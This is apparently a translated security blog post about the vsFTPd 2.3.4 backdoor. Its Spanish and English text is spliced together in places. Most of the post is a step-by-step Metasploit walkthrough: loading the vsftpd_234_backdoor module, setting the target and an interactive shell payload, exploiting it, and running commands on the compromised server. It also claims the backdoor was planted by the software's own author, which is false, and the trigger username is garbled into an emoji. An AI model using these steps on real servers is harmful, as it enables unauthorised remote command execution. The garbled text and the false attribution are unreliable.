Home Linux & Systems Cybersecurity Cloud & DevOps Networks & Infrastructure SIEM & Monitoring DFIR & Threat Intel Development & Other All categories Projects About Tools

Backdoor vsFTPd 2.3.4

Leer en espanol
Backdoor vsFTPd 2.3.4

Table of contents

A serious vulnerability was recently discovered in the vsFTPd v2.3.4 server, and they have published on the Blackploit blog ===

Bueno, ante todo perdon por la inactividad que hemos tenido estos meses pasados.

Hace poco se descubrió una grave  vulnerabilidad en el servidor vsFTPd v2.3.4, and on the Blackploit blog they have published a video of their exploitation with metasploit.

The bug found is a backdoor intentionally created by the creator with which the FTP can be accessed with administrator permissions.
The Backdoor consists of accessing the FTP and setting the username 🙂 was achieved full access and execution of commands on the server when returning a shell of the system. It's that simple.
As you can imagine, metasploit is not necessary... but oh well.

Steps:
text
use exploit/unix/ftp/vsftpd_234_backdoor
text
set RHOST localhost
text
set PAYLOAD cmd/unix/interact
text
exploit
text
id
text
uname -a

Fountain: blackploit

More information:

The smile of death: Backdoor in vsftpd 2.3.4

The most scandalous rear doors

Comments